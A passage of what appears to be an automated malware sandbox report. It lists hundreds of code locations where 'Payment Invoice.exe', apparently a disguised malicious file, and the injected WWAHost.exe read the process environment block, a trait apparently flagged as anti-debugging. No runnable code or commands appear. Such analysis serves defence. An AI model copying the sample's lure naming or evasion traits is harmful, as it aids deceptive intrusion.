Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01798CD6 mov eax, dword ptr fs:[00000030h]	14_2_01798CD6
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D849B mov eax, dword ptr fs:[00000030h]	14_2_016D849B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DFF60 mov eax, dword ptr fs:[00000030h]	14_2_016DFF60
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01798F6A mov eax, dword ptr fs:[00000030h]	14_2_01798F6A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DEF40 mov eax, dword ptr fs:[00000030h]	14_2_016DEF40
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C4F2E mov eax, dword ptr fs:[00000030h]	14_2_016C4F2E
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C4F2E mov eax, dword ptr fs:[00000030h]	14_2_016C4F2E
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FE730 mov eax, dword ptr fs:[00000030h]	14_2_016FE730
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FA70E mov eax, dword ptr fs:[00000030h]	14_2_016FA70E
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FA70E mov eax, dword ptr fs:[00000030h]	14_2_016FA70E
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175FF10 mov eax, dword ptr fs:[00000030h]	14_2_0175FF10
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175FF10 mov eax, dword ptr fs:[00000030h]	14_2_0175FF10
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179070D mov eax, dword ptr fs:[00000030h]	14_2_0179070D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179070D mov eax, dword ptr fs:[00000030h]	14_2_0179070D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EF716 mov eax, dword ptr fs:[00000030h]	14_2_016EF716
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017037F5 mov eax, dword ptr fs:[00000030h]	14_2_017037F5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01747794 mov eax, dword ptr fs:[00000030h]	14_2_01747794
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01747794 mov eax, dword ptr fs:[00000030h]	14_2_01747794
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01747794 mov eax, dword ptr fs:[00000030h]	14_2_01747794
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D8794 mov eax, dword ptr fs:[00000030h]	14_2_016D8794
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D766D mov eax, dword ptr fs:[00000030h]	14_2_016D766D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]	14_2_016EAE73
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]	14_2_016EAE73
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]	14_2_016EAE73
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]	14_2_016EAE73
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]	14_2_016EAE73
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]	14_2_016D7E41
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]	14_2_016D7E41
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]	14_2_016D7E41
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]	14_2_016D7E41
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]	14_2_016D7E41
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]	14_2_016D7E41
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178AE44 mov eax, dword ptr fs:[00000030h]	14_2_0178AE44
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178AE44 mov eax, dword ptr fs:[00000030h]	14_2_0178AE44
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0177FE3F mov eax, dword ptr fs:[00000030h]	14_2_0177FE3F
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CE620 mov eax, dword ptr fs:[00000030h]	14_2_016CE620
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CC600 mov eax, dword ptr fs:[00000030h]	14_2_016CC600
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CC600 mov eax, dword ptr fs:[00000030h]	14_2_016CC600
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CC600 mov eax, dword ptr fs:[00000030h]	14_2_016CC600
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F8E00 mov eax, dword ptr fs:[00000030h]	14_2_016F8E00
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781608 mov eax, dword ptr fs:[00000030h]	14_2_01781608
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FA61C mov eax, dword ptr fs:[00000030h]	14_2_016FA61C
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FA61C mov eax, dword ptr fs:[00000030h]	14_2_016FA61C
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F16E0 mov ecx, dword ptr fs:[00000030h]	14_2_016F16E0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D76E2 mov eax, dword ptr fs:[00000030h]	14_2_016D76E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F36CC mov eax, dword ptr fs:[00000030h]	14_2_016F36CC
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01798ED6 mov eax, dword ptr fs:[00000030h]	14_2_01798ED6
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0177FEC0 mov eax, dword ptr fs:[00000030h]	14_2_0177FEC0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01708EC7 mov eax, dword ptr fs:[00000030h]	14_2_01708EC7
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017446A7 mov eax, dword ptr fs:[00000030h]	14_2_017446A7
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01790EA5 mov eax, dword ptr fs:[00000030h]	14_2_01790EA5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01790EA5 mov eax, dword ptr fs:[00000030h]	14_2_01790EA5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01790EA5 mov eax, dword ptr fs:[00000030h]	14_2_01790EA5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175FE87 mov eax, dword ptr fs:[00000030h]	14_2_0175FE87
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03713B7A mov eax, dword ptr fs:[00000030h]	21_2_03713B7A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03713B7A mov eax, dword ptr fs:[00000030h]	21_2_03713B7A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EDB60 mov ecx, dword ptr fs:[00000030h]	21_2_036EDB60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B8B58 mov eax, dword ptr fs:[00000030h]	21_2_037B8B58
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EDB40 mov eax, dword ptr fs:[00000030h]	21_2_036EDB40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EF358 mov eax, dword ptr fs:[00000030h]	21_2_036EF358
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A131B mov eax, dword ptr fs:[00000030h]	21_2_037A131B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]	21_2_037103E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]	21_2_037103E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]	21_2_037103E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]	21_2_037103E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]	21_2_037103E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]	21_2_037103E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370DBE9 mov eax, dword ptr fs:[00000030h]	21_2_0370DBE9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037653CA mov eax, dword ptr fs:[00000030h]	21_2_037653CA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037653CA mov eax, dword ptr fs:[00000030h]	21_2_037653CA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03714BAD mov eax, dword ptr fs:[00000030h]	21_2_03714BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03714BAD mov eax, dword ptr fs:[00000030h]	21_2_03714BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03714BAD mov eax, dword ptr fs:[00000030h]	21_2_03714BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B5BA5 mov eax, dword ptr fs:[00000030h]	21_2_037B5BA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F1B8F mov eax, dword ptr fs:[00000030h]	21_2_036F1B8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F1B8F mov eax, dword ptr fs:[00000030h]	21_2_036F1B8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371B390 mov eax, dword ptr fs:[00000030h]	21_2_0371B390
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03712397 mov eax, dword ptr fs:[00000030h]	21_2_03712397
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A138A mov eax, dword ptr fs:[00000030h]	21_2_037A138A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0379D380 mov ecx, dword ptr fs:[00000030h]	21_2_0379D380
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0372927A mov eax, dword ptr fs:[00000030h]	21_2_0372927A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0379B260 mov eax, dword ptr fs:[00000030h]	21_2_0379B260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0379B260 mov eax, dword ptr fs:[00000030h]	21_2_0379B260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B8A62 mov eax, dword ptr fs:[00000030h]	21_2_037B8A62
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03774257 mov eax, dword ptr fs:[00000030h]	21_2_03774257
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]	21_2_036E9240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]	21_2_036E9240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]	21_2_036E9240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]	21_2_036E9240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AEA55 mov eax, dword ptr fs:[00000030h]	21_2_037AEA55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03724A2C mov eax, dword ptr fs:[00000030h]	21_2_03724A2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03724A2C mov eax, dword ptr fs:[00000030h]	21_2_03724A2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F8A0A mov eax, dword ptr fs:[00000030h]	21_2_036F8A0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03703A1C mov eax, dword ptr fs:[00000030h]	21_2_03703A1C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AAA16 mov eax, dword ptr fs:[00000030h]	21_2_037AAA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AAA16 mov eax, dword ptr fs:[00000030h]	21_2_037AAA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EAA16 mov eax, dword ptr fs:[00000030h]	21_2_036EAA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EAA16 mov eax, dword ptr fs:[00000030h]	21_2_036EAA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E5210 mov eax, dword ptr fs:[00000030h]	21_2_036E5210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E5210 mov ecx, dword ptr fs:[00000030h]	21_2_036E5210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E5210 mov eax, dword ptr fs:[00000030h]	21_2_036E5210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E5210 mov eax, dword ptr fs:[00000030h]	21_2_036E5210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03712AE4 mov eax, dword ptr fs:[00000030h]	21_2_03712AE4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03712ACB mov eax, dword ptr fs:[00000030h]	21_2_03712ACB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371FAB0 mov eax, dword ptr fs:[00000030h]	21_2_0371FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]	21_2_036E52A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]	21_2_036E52A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]	21_2_036E52A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]	21_2_036E52A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]	21_2_036E52A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FAAB0 mov eax, dword ptr fs:[00000030h]	21_2_036FAAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FAAB0 mov eax, dword ptr fs:[00000030h]	21_2_036FAAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371D294 mov eax, dword ptr fs:[00000030h]	21_2_0371D294
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371D294 mov eax, dword ptr fs:[00000030h]	21_2_0371D294
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EC962 mov eax, dword ptr fs:[00000030h]	21_2_036EC962
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EB171 mov eax, dword ptr fs:[00000030h]	21_2_036EB171
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EB171 mov eax, dword ptr fs:[00000030h]	21_2_036EB171
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370B944 mov eax, dword ptr fs:[00000030h]	21_2_0370B944
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370B944 mov eax, dword ptr fs:[00000030h]	21_2_0370B944
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371513A mov eax, dword ptr fs:[00000030h]	21_2_0371513A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371513A mov eax, dword ptr fs:[00000030h]	21_2_0371513A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]	21_2_03704120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]	21_2_03704120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]	21_2_03704120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]	21_2_03704120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03704120 mov ecx, dword ptr fs:[00000030h]	21_2_03704120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9100 mov eax, dword ptr fs:[00000030h]	21_2_036E9100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9100 mov eax, dword ptr fs:[00000030h]	21_2_036E9100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9100 mov eax, dword ptr fs:[00000030h]	21_2_036E9100
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EB1E1 mov eax, dword ptr fs:[00000030h]	21_2_036EB1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EB1E1 mov eax, dword ptr fs:[00000030h]	21_2_036EB1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EB1E1 mov eax, dword ptr fs:[00000030h]	21_2_036EB1E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037741E8 mov eax, dword ptr fs:[00000030h]	21_2_037741E8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]	21_2_037651BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]	21_2_037651BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]	21_2_037651BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]	21_2_037651BE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037669A6 mov eax, dword ptr fs:[00000030h]	21_2_037669A6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037161A0 mov eax, dword ptr fs:[00000030h]	21_2_037161A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037161A0 mov eax, dword ptr fs:[00000030h]	21_2_037161A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]	21_2_037A49A4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]	21_2_037A49A4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]	21_2_037A49A4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]	21_2_037A49A4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03712990 mov eax, dword ptr fs:[00000030h]	21_2_03712990
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370C182 mov eax, dword ptr fs:[00000030h]	21_2_0370C182
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371A185 mov eax, dword ptr fs:[00000030h]	21_2_0371A185
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A2073 mov eax, dword ptr fs:[00000030h]	21_2_037A2073
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B1074 mov eax, dword ptr fs:[00000030h]	21_2_037B1074
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03700050 mov eax, dword ptr fs:[00000030h]	21_2_03700050
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03700050 mov eax, dword ptr fs:[00000030h]	21_2_03700050
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]	21_2_036FB02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]	21_2_036FB02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]	21_2_036FB02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]	21_2_036FB02A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]	21_2_0371002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]	21_2_0371002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]	21_2_0371002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]	21_2_0371002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]	21_2_0371002D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03767016 mov eax, dword ptr fs:[00000030h]	21_2_03767016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03767016 mov eax, dword ptr fs:[00000030h]	21_2_03767016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03767016 mov eax, dword ptr fs:[00000030h]	21_2_03767016
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B4015 mov eax, dword ptr fs:[00000030h]	21_2_037B4015
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B4015 mov eax, dword ptr fs:[00000030h]	21_2_037B4015
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E58EC mov eax, dword ptr fs:[00000030h]	21_2_036E58EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E40E1 mov eax, dword ptr fs:[00000030h]	21_2_036E40E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E40E1 mov eax, dword ptr fs:[00000030h]	21_2_036E40E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E40E1 mov eax, dword ptr fs:[00000030h]	21_2_036E40E1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0377B8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377B8D0 mov ecx, dword ptr fs:[00000030h]	21_2_0377B8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0377B8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0377B8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0377B8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0377B8D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371F0BF mov ecx, dword ptr fs:[00000030h]	21_2_0371F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371F0BF mov eax, dword ptr fs:[00000030h]	21_2_0371F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371F0BF mov eax, dword ptr fs:[00000030h]	21_2_0371F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037290AF mov eax, dword ptr fs:[00000030h]	21_2_037290AF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E9080 mov eax, dword ptr fs:[00000030h]	21_2_036E9080
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03763884 mov eax, dword ptr fs:[00000030h]	21_2_03763884
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03763884 mov eax, dword ptr fs:[00000030h]	21_2_03763884
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FFF60 mov eax, dword ptr fs:[00000030h]	21_2_036FFF60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B8F6A mov eax, dword ptr fs:[00000030h]	21_2_037B8F6A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FEF40 mov eax, dword ptr fs:[00000030h]	21_2_036FEF40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E4F2E mov eax, dword ptr fs:[00000030h]	21_2_036E4F2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E4F2E mov eax, dword ptr fs:[00000030h]	21_2_036E4F2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371E730 mov eax, dword ptr fs:[00000030h]	21_2_0371E730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370F716 mov eax, dword ptr fs:[00000030h]	21_2_0370F716
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377FF10 mov eax, dword ptr fs:[00000030h]	21_2_0377FF10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377FF10 mov eax, dword ptr fs:[00000030h]	21_2_0377FF10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B070D mov eax, dword ptr fs:[00000030h]	21_2_037B070D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B070D mov eax, dword ptr fs:[00000030h]	21_2_037B070D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371A70E mov eax, dword ptr fs:[00000030h]	21_2_0371A70E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371A70E mov eax, dword ptr fs:[00000030h]	21_2_0371A70E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037237F5 mov eax, dword ptr fs:[00000030h]	21_2_037237F5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03767794 mov eax, dword ptr fs:[00000030h]	21_2_03767794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03767794 mov eax, dword ptr fs:[00000030h]	21_2_03767794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03767794 mov eax, dword ptr fs:[00000030h]	21_2_03767794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F8794 mov eax, dword ptr fs:[00000030h]	21_2_036F8794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F766D mov eax, dword ptr fs:[00000030h]	21_2_036F766D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]	21_2_0370AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]	21_2_0370AE73
